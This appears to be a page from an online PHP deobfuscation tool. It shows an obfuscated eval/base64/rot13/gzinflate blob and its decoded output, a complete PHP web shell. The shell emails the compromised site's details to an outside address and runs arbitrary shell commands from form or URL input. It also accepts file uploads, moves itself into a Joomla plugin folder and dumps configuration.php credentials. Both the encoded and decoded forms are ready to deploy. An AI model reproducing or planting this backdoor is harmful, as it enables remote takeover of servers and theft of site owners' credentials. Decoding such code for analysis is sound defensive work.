Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzinflate(str_rot13(base64_decode('rUluQuNTEP3c/IpyG8mODnl1SOlRMDoK5oiuEBon/QLI2tiTcQ..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Target ditemukan 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/plugins/user/explore.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="Klimax"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." Succes! "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

if(isset($_GET['baca'])){
$conf = file_get_contents("../../configuration.php");
echo $conf;
}

Did this file decode correctly?

Original Code

eval(gzinflate(str_rot13(base64_decode('rUluQuNTEP3c/IpyG8mODnl1SOlRMDoK5oiuEBon/QLI2tiTcQ9717LXBIr4753dtVBlY5RJFyHhzJtsM/NpPBsoWEzGJRSyR1zM3d1ev8N0xN3iSAXK7cZEGFKD4cWVM3Jf2a1m0+v99Njp3vGKq1HWT5GA7PY73SVZ8Va7j/4KVEr0eTy+jM+G0ZjeIMrF1w1nFP45CaNkPBkNDD6V6QM60DEr56BVyhXk9S0T5E11cx1C0a1vM8hqRkDXQlzwGH1dVBvjXKbgtKWv/G3ksVtORZdcPSB7Z2caxufDkxDjh6entP/UgayCN5wu0FTnhbKAMsBnC0yp6YNgObirYRz7Pz46ORmhPrZduEiyUYrvxYzC8+E4fI7JGc9cbQsFK5ny5mXBkttCZnr1EpnTek+NVWebnrGKdORqfRoo0E+pb9/3W5VDr7aXeDG4JBGUaqDrdW24FgStA6wvwfrQ3JZXaN0vDhsD9/qdlVkv8A8ftD585rbT8jkcXzlWJgXoVsFOqXFdJrB++EFnPBpcjuPTwR/hxdFs6OgBVaFFnATPQSfD48lsazGOVMPh2LnxqF9x9ZyLyq+xEx/ui1mW4BWLAgejBKuuWrZaLF1CSv7jc3P/PTOzYnSmA8lPEm2guMrgYyK+CLkUcYdRPC8yINECsuzAt+jBtDzEHpqImcRKquJ/UPALViT2GPz80XzQ75Btq6wePfCnenkXerHWJaAu9bDDGA0oijJTt+fR3jszWdAfm6hsGhii/AEfkWCVwaNx/gzOvwXXim1KOn1hmI/qg4x4Zoq9DZZMLRLFpSDFEkYRnKhxmdr3KtEWM33dOqhHTBayZTW87fiOHj6DeXYoA26Q3s4e2lhDaCmINmvo2hzp45pMQrW1vsZ+ff1+bfT9Hr9WoVJlQ6QyJ7leFSjtpd6ahJm2A1cP35bwS+Y5E3Yr2QEXUq2IbSggoAruFSVN1YAmbFc30aie5vwZtzyU3LGsxu9fMp6zewzxaGSHQX+jScBGMSRsnSmOWFgZt52UKdbW3jak+/mXJib4NrOUnPIMWSO+9n7Rz4KnKYim3spJv+Eww/gG1uOov9Im51TL9nMVF7A00ftxvYg1fq2njd77rckjYKkfKFYySUiBbxsBtsgGo0a1Rdc2vK7u2hLVgl05NrZMo7XxQrle5cV37re6pog2oqkFUB4NYLauXrPRldPq4dygn2TSM5jLO4gtN6Sxxt1KI0dexDYKl+uqFs9xsaX8ECbs1GGNaR7w+oMUt8ATsViXecBEnSRDSFGhyfuWDBeVxbcI7ZMnfNdeKNyMfCMxviBTsAbLRn0xNVisKG59aX56dHTXfGMvSm2jx2MPiauJzA6z4+PrS7q2QTavynyVXjb5n+3/M718I/9Xwv/E6XEV2cmY8yrti+t/yhK2d1fMsCl9+LG5ljAWr6UKYinPxz+N82yNP2xjX5jLvNc0ek+R/h8='))));

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 1d7e5597c4e3440e828a7de06c839cca
Eval Count 1
Decode Time 78 ms